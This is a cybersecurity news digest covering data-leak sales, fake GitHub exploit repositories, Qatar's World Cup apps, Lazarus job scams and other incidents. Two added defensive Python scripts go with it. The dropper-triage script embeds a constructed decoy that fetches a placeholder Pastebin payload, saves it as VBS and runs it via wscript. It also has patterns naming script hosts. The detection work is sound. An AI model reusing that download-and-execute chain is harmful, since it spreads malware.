A threat actor is advertising data from Anagold, a Turkish gold mining company, on breached.co, a forum created as an alternative to raidforums.com.
Anagold is a partner of the Canadian company SSR Mining and operates gold mines in Turkey. In recent months there have been allegations of cyanide leaks in Turkey involving the company.
According to the threat actor's post, only 8 GB of data is being shared for now and more will follow later. The data reportedly includes survey maps of gold reserves.
The company has not yet made a statement about the allegations.
Cobalt Strike is a legitimate commercial penetration testing tool, used mostly by red teams and in security training. However, cracked copies are widely used by threat actors for intrusion and lateral movement in their victims' networks.
Google Cloud has released a set of open-source YARA rules for detecting Cobalt Strike components, covering versions dating back to 2012. The rule set contains 165 detection signatures that flag more than 300 different Cobalt Strike binaries.
“We are releasing to the community a set of open-source YARA Rules and their integration as a VirusTotal Collection to help the community flag and identify Cobalt Strike's components and its respective versions. Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe,” Google Cloud said in its post.
Cobalt Strike includes features such as discovery, payload creation, MS Office macro generation, and website cloning. Many threat actors in the field have been observed using it.
In recent years it has become very common to share PoC exploits for known vulnerabilities, and several PoCs for a given vulnerability can easily be found on GitHub. A research team from the Leiden Institute of Advanced Computer Science announced that they discovered thousands of GitHub repositories offering fake PoC exploits for multiple vulnerabilities.
The study covers vulnerabilities disclosed between 2017 and 2021. For these vulnerabilities the team analyzed 47,313 repositories and found that 4,893 of them were malicious and were being used by threat actors to spread malware. The researchers also analyzed a total of 358,277 IP addresses, of which 150,734 were unique and 2,864 were blacklisted.
One example given is a fake PoC for CVE-2019-0708. “This repository was created by a user under the name Elkhazrajy. The source code contains a base64 line that once decoded will be run. It contains another Python script with a link to Pastebin that will be saved as a VBScript, then run by the first exec command. After investigating the VBScript we discovered that it contains the Houdini malware,” the team wrote in their paper.
It seems likely that fake PoCs will keep appearing for both newly disclosed and legacy vulnerabilities. Even when a PoC is not malicious, public PoCs make exploitation accessible to a wide audience, including less experienced attackers, so a vulnerability is likely to be exploited soon after disclosure and until it is patched. Security teams therefore need to prioritize and patch critical vulnerabilities faster. This also underlines the value of a professional intelligence service that prioritizes vulnerabilities according to the organization's threat profile, as determined by that same service.
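The dropper pattern the Leiden team describes (a base64 blob handed to exec, which fetches a second stage from a paste site and runs it through a script host) can be spotted before anything is executed. The following is an added example, not code from the paper or from the repository it describes: a small static triage script that finds base64 string literals in a Python "PoC", decodes them layer by layer, scans each layer for staging indicators, and returns a verdict. The indicator list and the sample "PoC" are constructed for this example; the sample does nothing real and its Pastebin URL is a placeholder.

```python
import ast
import base64
import binascii
import re
from typing import Iterator, Optional, Set

# Staging indicators. This list is constructed for the example; tune it for
# your own triage. Each hit is tagged with the decoding layer it was found in,
# because behaviour hidden under base64 is the real red flag.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"https?://[^\s'\"]+", re.I),
    "script_host": re.compile(r"\b(?:wscript|cscript|mshta|powershell|cmd\.exe)\b", re.I),
    "vbs_dropper": re.compile(r"\.vbs\b", re.I),
    "dynamic_exec": re.compile(r"\b(?:exec|eval|compile)\s*\(", re.I),
}


def _try_b64(s: str) -> Optional[str]:
    """Return the decoded text if s looks like a base64 blob of text, else None."""
    if len(s) < 32 or not re.fullmatch(r"[A-Za-z0-9+/=\s]+", s):
        return None
    try:
        text = base64.b64decode(s, validate=False).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable >= 0.9 * len(text) else None


def _string_literals(source: str) -> Iterator[str]:
    """Yield every string constant in the source; yield nothing if it is not Python."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value


def _walk(source: str, depth: int, max_depth: int, findings: Set[str]) -> int:
    """Scan one layer, recurse into decodable literals, return layers decoded."""
    layers = 0
    for name, pat in SUSPICIOUS_PATTERNS.items():
        if pat.search(source):
            findings.add(f"layer{depth}:{name}")
    if depth >= max_depth:
        return layers
    for lit in _string_literals(source):
        decoded = _try_b64(lit)
        if decoded is not None:
            layers += 1 + _walk(decoded, depth + 1, max_depth, findings)
    return layers


def triage_poc(source: str, max_depth: int = 3) -> dict:
    """Static triage of a Python PoC. 'suspicious' means indicators were found
    inside a base64-hidden layer; 'review' means only visible ones; else 'clean'."""
    findings: Set[str] = set()
    layers = _walk(source, 0, max_depth, findings)
    hidden = [f for f in findings if not f.startswith("layer0:")]
    verdict = "suspicious" if hidden else ("review" if findings else "clean")
    return {"verdict": verdict, "findings": sorted(findings), "decoded_layers": layers}


# Constructed second stage: mimics the described fetch-paste-save-as-VBS-run chain.
# The URL is a placeholder, not a real paste.
STAGE2 = '''import urllib.request, subprocess
data = urllib.request.urlopen("https://pastebin.com/raw/EXAMPLE").read()
open("update.vbs", "wb").write(data)
subprocess.call(["wscript", "update.vbs"])
'''

# Constructed decoy "PoC": a reassuring print, then exec of the hidden stage.
FAKE_POC = f'''# "PoC" for CVE-2019-0708 -- constructed decoy, does nothing real
import base64
print("[*] Checking target for BlueKeep ...")
exec(base64.b64decode("{base64.b64encode(STAGE2.encode()).decode()}"))
'''

# Constructed benign-looking snippet for comparison.
BENIGN = 'import socket\ns = socket.socket()\ns.connect(("10.0.0.5", 3389))\n'

if __name__ == "__main__":
    import json
    print(json.dumps(triage_poc(FAKE_POC), indent=2))
    print(json.dumps(triage_poc(BENIGN), indent=2))
```

The point of tagging hits with the layer is that a URL or `wscript` call visible in plain source is merely worth a look, while the same indicator appearing only after decoding a literal is exactly the Elkhazrajy pattern. Run the script against a cloned repository's `.py` files before executing any of them.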
Qatar is the first Arab country to host the World Cup, and this year is also an exception because the tournament is being held in winter, from 20 November to 18 December.
The World Cup is one of the biggest sporting events in the world, and thousands of football fans from all over the world are planning to attend. However, Qatar requires visitors to install two applications on their mobile phones.
According to news reports quoting Øyvind Vasaasen, Head of Security at the Norwegian broadcaster NRK, visitors should not bring their own mobile phones to Qatar at all.
The first mandatory application is Ehteraz, a Covid-19 tracking application required for visitors over 18. It tracks users' location and was used during the pandemic in Qatar to enforce quarantine of infected individuals. It has also been found to request permission to “read, delete or change all content on the phone,” as well as access to connect to WiFi and Bluetooth, draw over other apps, and prevent the phone from going to sleep.
The second is Hayya, which visitors use to manage their tickets and which also grants access to free metro travel in Qatar. Like Ehteraz, Hayya can obtain visitors' location and view network connections.
Installing these two applications therefore gives whoever controls them the ability to read and modify the data on your phone, and potentially to retrieve information from other applications installed on it.
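The capabilities described above correspond to concrete entries in an app's AndroidManifest.xml, which can be inspected before installing (for instance after decoding the APK with apktool). The following is an added example, not code from the article or from either app: it groups the permissions an app requests into the capability classes mentioned in the text and flags apps that span several unrelated ones. The manifest below is constructed to illustrate those classes; it is not the real manifest of Ehteraz or Hayya, and the grouping is this example's own, though the permission names are genuine Android constants.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Android manifest attributes live in this namespace (android:name etc.).
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capability classes from the article, mapped to real Android permission names.
# The grouping itself is constructed for this example.
RISK_GROUPS = {
    "location tracking": {
        "android.permission.ACCESS_FINE_LOCATION",
        "android.permission.ACCESS_COARSE_LOCATION",
        "android.permission.ACCESS_BACKGROUND_LOCATION",
    },
    "read/modify/delete phone content": {
        "android.permission.READ_EXTERNAL_STORAGE",
        "android.permission.WRITE_EXTERNAL_STORAGE",
        "android.permission.MANAGE_EXTERNAL_STORAGE",
    },
    "WiFi/Bluetooth control": {
        "android.permission.CHANGE_WIFI_STATE",
        "android.permission.BLUETOOTH",
        "android.permission.BLUETOOTH_ADMIN",
        "android.permission.BLUETOOTH_CONNECT",
        "android.permission.BLUETOOTH_SCAN",
    },
    "draw over other apps": {"android.permission.SYSTEM_ALERT_WINDOW"},
    "keep device awake": {"android.permission.WAKE_LOCK"},
    "view network connections": {
        "android.permission.ACCESS_NETWORK_STATE",
        "android.permission.ACCESS_WIFI_STATE",
    },
}


def requested_permissions(manifest_xml: str) -> List[str]:
    """Return every android:name from <uses-permission> elements, in order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")]


def review_permissions(manifest_xml: str) -> Dict[str, List[str]]:
    """Map requested permissions onto RISK_GROUPS; groups with no hits are omitted."""
    requested = set(requested_permissions(manifest_xml))
    return {
        group: sorted(requested & perms)
        for group, perms in RISK_GROUPS.items()
        if requested & perms
    }


def needs_scrutiny(manifest_xml: str, min_groups: int = 3) -> bool:
    """Flag an app whose permissions span several unrelated capability classes,
    e.g. a health-check app that also wants storage, overlay and Bluetooth control."""
    return len(review_permissions(manifest_xml)) >= min_groups


# Constructed manifest for demonstration only (not any real app's manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="example.constructed.tracker">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <application android:label="constructed sample"/>
</manifest>
"""

if __name__ == "__main__":
    for group, perms in review_permissions(SAMPLE_MANIFEST).items():
        print(f"{group}: {', '.join(perms)}")
    print("needs scrutiny:", needs_scrutiny(SAMPLE_MANIFEST))
```

The check is deliberately coarse: it does not judge any single permission, only whether the set taken together exceeds what the app's stated purpose (contact tracing, ticketing) plausibly needs. Runtime-granted permissions can still be denied on the device, but a manifest this broad is the signal to prefer a secondary phone, as NRK advises.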
There has been a significant increase in incidents resulting from fake job postings, likely driven by the spread of remote work after Covid. These fake ads, job scams, typically lure targets with remote working conditions and high salaries.
Most recently, the North Korean APT38 (aka Lazarus) group targeted employees with fake job posting emails impersonating Coinbase, one of the world's largest and most popular cryptocurrency exchanges; the emails appeared to come from Coinbase itself.
Subject: BITCOIN JOB OPPORTUNITY
Not familiar with BITCOIN? Then this is an opportunity for you to learn & make money. COINBASE COMPANY ( A secure platform that makes it easy to buy, sell, and store cryptocurrency like Bitcoin, Ethereum) seek INDIVIDUALS who can VISIT at least “one” BITCOIN ATM every week for survey. Weekly pay is $350. No specific time required as long as work is completed in a timely manner. For more information’s, Please Email Coordinator Brian at (external email address) for more information NOTE: Candidates should email (only) with their PERSONAL EMAIL Address for consideration. Sincerely,
How does it work?
The email above is an example sent by the North Korean group in Coinbase's name. The attackers first create fake job postings on LinkedIn and fake websites that are exact clones of the original, then direct victims to these sites via LinkedIn and email. Once a victim applies through the fake website, they receive an email that may contain malicious files; in other cases the attackers continue the social engineering by holding job interviews with the victims.
Fake SMS messages are another common method: attackers send texts that appear to come from companies' HR managers.
A threat actor called ‘4c3’ is selling access to a central bank, without disclosing the bank's name.
The ad was posted today on exploit.in. The threat actor did not name the bank but gave some details: it uses Symantec as its EDR, has around 10,000 machines, mostly running Windows, and runs the Oracle Flexcube core banking platform.
The threat actor claims to be able to provide VPN access to the central bank along with a full dump of domain passwords.
The threat actor stated that the bank's name will not be given publicly, only via private chat.
exploit.in is a very popular Russian underground hacking forum.
Large-scale cyber attacks against Azerbaijan's electronic information resources are being prepared.
This was announced by the Center for Combating Computer Incidents of Azerbaijan's State Service of Special Communication and Information Security.
“The Center for Combating Computer Incidents of the Special Communication and Information Security State Service (XRITDX) monitors cyber attacks against our country 24/7 and successfully prevents DDOS and other types of cyber attacks against state information resources since 03.05.2022.”
“XRITDX calls on state and non-state information resource administrators, as well as our citizens, to be careful and vigilant against phishing attacks.”
Today, posts about Azerbaijan in many Russian Telegram channels attracted attention. They state that the threat actor will attack Azerbaijani government targets for a few weeks.
Subsequently, information about some of Azerbaijan's airports and major gas station networks was shared in Telegram groups, which also drew attention.
We will share developments on this subject as soon as possible.
Solana announced that an attack affected more than 7,700 wallets, including Slope and Phantom wallets.
Experts recommend that holders of affected wallets move their funds to cold wallets; for those without a cold wallet, transferring funds to a centralized exchange is a reasonable alternative.
Analysts say the attack technique is still unknown and that a bug elsewhere, rather than in the Solana blockchain itself, may be the cause. A 0-day vulnerability seems the most plausible way to obtain such a large number of private keys.
According to the blockchain analytics firm Elliptic, $5.8 million in crypto assets were stolen in August alone, including SOL, USD and NFTs.
In May we reported that the US Department of State was offering a reward of up to $10M for information leading to the identification and/or location of any leaders of the Conti ransomware group, plus an additional $5M for information leading to the arrest and/or conviction of anyone conspiring to take part in Conti attacks.
On 25 July the Department of State raised the reward for information that could identify Conti members to $15M. The additional $5M offer for information enabling arrests still stands.
After many companies imposed sanctions on Russia, Cisco announced in June that it would leave the country. According to CNews, illegal Cisco licenses appeared for sale in Russia after this decision.
Several methods of using Cisco licenses illegally are described. In some cases a government agency had a Cisco product hacked with the help of an external company, and paying in cryptocurrency was cited as another way of obtaining licenses.
The Russian integrator Ramek-VS openly offers a service called UNLIC, which it describes as “the return of the stability of the Cisco infrastructure.”
Ramek-VS also guarantees complete confidentiality and the absence of legal risks under Russian law.
Technically, one source of these licenses is outright hacking. The second method is registering the licenses in China or Montenegro, declaring the equipment as if it were to be used there rather than in Russia.